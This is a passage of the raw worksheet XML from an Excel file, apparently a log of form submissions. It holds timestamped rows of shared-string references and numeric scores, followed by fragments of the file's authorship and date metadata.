      <c r="C30048" t="s">
        <v>10</v>
      </c>
      <c r="D30048" t="s">
        <v>20</v>
      </c>
      <c r="E30048" t="s">
        <v>27424</v>
      </c>
      <c r="F30048">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30049" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30049" s="1">
        <v>42800.601111111115</v>
      </c>
      <c r="C30049" t="s">
        <v>41</v>
      </c>
      <c r="E30049" t="s">
        <v>27425</v>
      </c>
      <c r="F30049">
        <f t="shared" ca="1" si="469"/>
        <v>4</v>
      </c>
    </row>
    <row r="30050" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A30050" s="1">
        <v>42800.5862037037</v>
      </c>
      <c r="C30050" t="s">
        <v>10</v>
      </c>
      <c r="D30050" t="s">
        <v>6</v>
      </c>
      <c r="E30050" s="2" t="s">
        <v>27426</v>
      </c>
      <c r="F30050">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30051" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A30051" s="1">
        <v>42800.577800925923</v>
      </c>
      <c r="C30051" t="s">
        <v>10</v>
      </c>
      <c r="D30051" t="s">
        <v>36</v>
      </c>
      <c r="E30051" s="2" t="s">
        <v>27427</v>
      </c>
      <c r="F30051">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30052" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A30052" s="1">
        <v>42800.57508101852</v>
      </c>
      <c r="C30052" t="s">
        <v>10</v>
      </c>
      <c r="D30052" t="s">
        <v>33</v>
      </c>
      <c r="E30052" s="2" t="s">
        <v>27428</v>
      </c>
      <c r="F30052">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30053" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30053" s="1">
        <v>42800.55395833333</v>
      </c>
      <c r="C30053" t="s">
        <v>10</v>
      </c>
      <c r="D30053" t="s">
        <v>192</v>
      </c>
      <c r="E30053" t="s">
        <v>27429</v>
      </c>
      <c r="F30053">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30054" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30054" s="1">
        <v>42800.541446759256</v>
      </c>
      <c r="C30054" t="s">
        <v>260</v>
      </c>
      <c r="E30054" t="s">
        <v>27430</v>
      </c>
      <c r="F30054">
        <f t="shared" ca="1" si="469"/>
        <v>1</v>
      </c>
    </row>
    <row r="30055" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A30055" s="1">
        <v>42800.51935185185</v>
      </c>
      <c r="C30055" t="s">
        <v>10</v>
      </c>
      <c r="D30055" t="s">
        <v>56</v>
      </c>
      <c r="E30055" s="2" t="s">
        <v>27431</v>
      </c>
      <c r="F30055">
        <f t="shared" ca="1" si="469"/>
        <v>1</v>
      </c>
    </row>
    <row r="30056" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30056" s="1">
        <v>42800.508483796293</v>
      </c>
      <c r="C30056" t="s">
        <v>6</v>
      </c>
      <c r="D30056" t="s">
        <v>25</v>
      </c>
      <c r="E30056" t="s">
        <v>27432</v>
      </c>
      <c r="F30056">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30057" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A30057" s="1">
        <v>42800.505925925929</v>
      </c>
      <c r="C30057" t="s">
        <v>6</v>
      </c>
      <c r="D30057" t="s">
        <v>194</v>
      </c>
      <c r="E30057" s="2" t="s">
        <v>27433</v>
      </c>
      <c r="F30057">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30058" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A30058" s="1">
        <v>42800.488483796296</v>
      </c>
      <c r="C30058" t="s">
        <v>10</v>
      </c>
      <c r="D30058" t="s">
        <v>336</v>
      </c>
      <c r="E30058" s="2" t="s">
        <v>27434</v>
      </c>
      <c r="F30058">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30059" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30059" s="1">
        <v>42800.464768518519</v>
      </c>
      <c r="C30059" t="s">
        <v>10</v>
      </c>
      <c r="D30059" t="s">
        <v>20</v>
      </c>
      <c r="E30059" t="s">
        <v>27435</v>
      </c>
      <c r="F30059">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30060" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A30060" s="1">
        <v>42800.456388888888</v>
      </c>
      <c r="C30060" t="s">
        <v>10</v>
      </c>
      <c r="D30060" t="s">
        <v>17</v>
      </c>
      <c r="E30060" s="2" t="s">
        <v>27436</v>
      </c>
      <c r="F30060">
        <f t="shared" ca="1" si="469"/>
        <v>1</v>
      </c>
    </row>
    <row r="30061" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A30061" s="1">
        <v>42800.454791666663</v>
      </c>
      <c r="C30061" t="s">
        <v>5020</v>
      </c>
      <c r="E30061" s="2" t="s">
        <v>27437</v>
      </c>
      <c r="F30061">
        <f t="shared" ca="1" si="469"/>
        <v>1</v>
      </c>
    </row>
    <row r="30062" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A30062" s="1">
        <v>42800.433715277781</v>
      </c>
      <c r="C30062" t="s">
        <v>559</v>
      </c>
      <c r="E30062" s="2" t="s">
        <v>27438</v>
      </c>
      <c r="F30062">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30063" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A30063" s="1">
        <v>42800.432939814818</v>
      </c>
      <c r="C30063" t="s">
        <v>6</v>
      </c>
      <c r="D30063" t="s">
        <v>194</v>
      </c>
      <c r="E30063" s="2" t="s">
        <v>27439</v>
      </c>
      <c r="F30063">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30064" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30064" s="1">
        <v>42800.423634259256</v>
      </c>
      <c r="C30064" t="s">
        <v>6</v>
      </c>
      <c r="D30064" t="s">
        <v>25</v>
      </c>
      <c r="E30064" t="s">
        <v>829</v>
      </c>
      <c r="F30064">
        <f t="shared" ca="1" si="469"/>
        <v>3</v>
      </c>
    </row>
    <row r="30065" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30065" s="1">
        <v>42800.42328703704</v>
      </c>
      <c r="C30065" t="s">
        <v>6</v>
      </c>
      <c r="E30065" t="s">
        <v>32</v>
      </c>
      <c r="F30065">
        <f t="shared" ca="1" si="469"/>
        <v>1</v>
      </c>
    </row>
    <row r="30066" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30066" s="1">
        <v>41955.746967592589</v>
      </c>
      <c r="C30066" t="s">
        <v>10</v>
      </c>
      <c r="D30066" t="s">
        <v>41</v>
      </c>
      <c r="E30066" t="s">
        <v>27440</v>
      </c>
      <c r="F30066">
        <f t="shared" ca="1" si="469"/>
        <v>4</v>
      </c>
    </row>
    <row r="30067" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A30067" s="1">
        <v>41955.745057870372</v>
      </c>
      <c r="C30067" t="s">
        <v>10</v>
      </c>
      <c r="D30067" t="s">
        <v>6</v>
      </c>
      <c r="E30067" s="2" t="s">
        <v>27441</v>
      </c>
      <c r="F30067">
        <f t="shared" ca="1" si="469"/>
        <v>4</v>
      </c>
    </row>
    <row r="30068" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30068" s="1">
        <v>41955.706446759257</v>
      </c>
      <c r="C30068" t="s">
        <v>10</v>
      </c>
      <c r="D30068" t="s">
        <v>36</v>
      </c>
      <c r="E30068" t="s">
        <v>27442</v>
      </c>
      <c r="F30068">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30069" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30069" s="1">
        <v>41955.637731481482</v>
      </c>
      <c r="C30069" t="s">
        <v>10</v>
      </c>
      <c r="D30069" t="s">
        <v>229</v>
      </c>
      <c r="E30069" t="s">
        <v>27443</v>
      </c>
      <c r="F30069">
        <f t="shared" ca="1" si="469"/>
        <v>2</v>
      </c>
    </row>
    <row r="30070" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30070" s="1">
        <v>41955.633344907408</v>
      </c>
      <c r="C30070" t="s">
        <v>10</v>
      </c>
      <c r="D30070" t="s">
        <v>263</v>
      </c>
      <c r="E30070" t="s">
        <v>27444</v>
      </c>
      <c r="F30070">
        <f t="shared" ca="1" si="469"/>
        <v>5</v>
      </c>
    </row>
    <row r="30071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30071" s="1">
        <v>41955.631354166668</v>
      </c>
      <c r="C30071" t="s">
        <v>10</v>
      </c>
      <c r="D30071" t="s">
        <v>89</v>
      </c>
      <c r="E30071" t="s">
        <v>27445</v>
      </c>
      <c r="F30071">
        <f t="shared" ca="1" si="469"/>
        <v>1</v>
      </c>
    </row>
    <row r="30072" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30072" s="1">
        <v>41955.628750000003</v>
      </c>
      <c r="C30072" t="s">
        <v>10</v>
      </c>
      <c r="D30072" t="s">
        <v>92</v>
      </c>
      <c r="E30072" t="s">
        <v>27446</v>
      </c>
      <c r="F30072">
        <f t="shared" ca="1" si="46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FormSubmissions-11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 Lund</dc:creator>
  <cp:lastModifiedBy>Jesse Freeman</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-04T19:30:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-22T13:43:56Z</dcterms:modified>
</cp:coreProperties>
</file>